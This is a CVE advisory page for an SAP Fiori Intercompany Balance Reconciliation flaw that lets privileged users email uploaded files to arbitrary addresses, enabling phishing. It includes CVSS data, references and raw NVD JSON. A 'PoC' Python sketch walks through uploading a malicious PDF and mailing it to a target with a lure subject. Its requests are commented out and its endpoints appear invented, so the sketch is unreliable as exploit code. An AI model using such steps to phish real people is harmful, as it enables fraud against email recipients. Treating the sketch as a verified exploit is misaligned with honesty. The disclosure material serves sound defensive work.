Security Vulnerability Report
CVE-2026-0495 CVSS 5.1 MEDIUM

CVE-2026-0495

Published: 2026-01-13 02:15:52
Last Modified: 2026-04-15 00:35:42

Description

SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application.

CVSS Details

CVSS Score
5.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP Fiori App Intercompany Balance Reconciliation (ICBR) - for the specific affected versions, refer to the official SAP security advisory
SAP S/4HANA - for affected versions, see SAP Note 3565506

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-0495 PoC - SAP Fiori Phishing Attack
# Requires high-privilege SAP account access
import requests
import json

# Configuration
SAP_HOST = "https://sap-system.example.com"
USERNAME = "attacker_account"
PASSWORD = "password"
TARGET_EMAIL = "[email protected]"
PHISHING_FILE = "malicious_document.pdf"

# Step 1: Authenticate to SAP Fiori
session = requests.Session()
login_url = f"{SAP_HOST}/sap/public/logon"
auth_data = {
    "UserName": USERNAME,
    "Password": PASSWORD
}
# session.post(login_url, data=auth_data)

# Step 2: Access Intercompany Balance Reconciliation app
app_url = f"{SAP_HOST}/sap/fi/icbr"
# response = session.get(app_url)

# Step 3: Upload phishing file
upload_url = f"{SAP_HOST}/sap/fi/icbr/upload"
files = {'file': (PHISHING_FILE, open(PHISHING_FILE, 'rb'), 'application/pdf')}
# upload_response = session.post(upload_url, files=files)

# Step 4: Send file to target email
send_url = f"{SAP_HOST}/sap/fi/icbr/send"
send_data = {
    "file_id": "uploaded_file_reference",
    "recipient_email": TARGET_EMAIL,
    "subject": "Intercompany Balance Statement",
    "message": "Please review attached statement"
}
# send_response = session.post(send_url, json=send_data)

print("PoC demonstrates file upload and email send functionality abuse")
print("Actual exploitation requires valid SAP credentials with high privileges")

References

https://me.sap.com/notes/3565506 (SAP Note 3565506)
https://url.sap/sapsecuritypatchday (SAP Security Patch Day)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-0495",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T02:15:51.830",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP Fiori App Intercompany Balance Reconciliation allows an attacker with high privileges to send uploaded files to arbitrary emails which could enable effective phishing campaigns. This has low impact on confidentiality, integrity and availability of the application."
      },
      {
        "lang": "es",
        "value": "La aplicación SAP Fiori Intercompany Balance Reconciliation permite a un atacante con altos privilegios enviar archivos cargados a correos electrónicos arbitrarios, lo que podría facilitar campañas de phishing efectivas. Esto tiene un impacto bajo en la confidencialidad, integridad y disponibilidad de la aplicación."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 5.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-15"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3565506",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}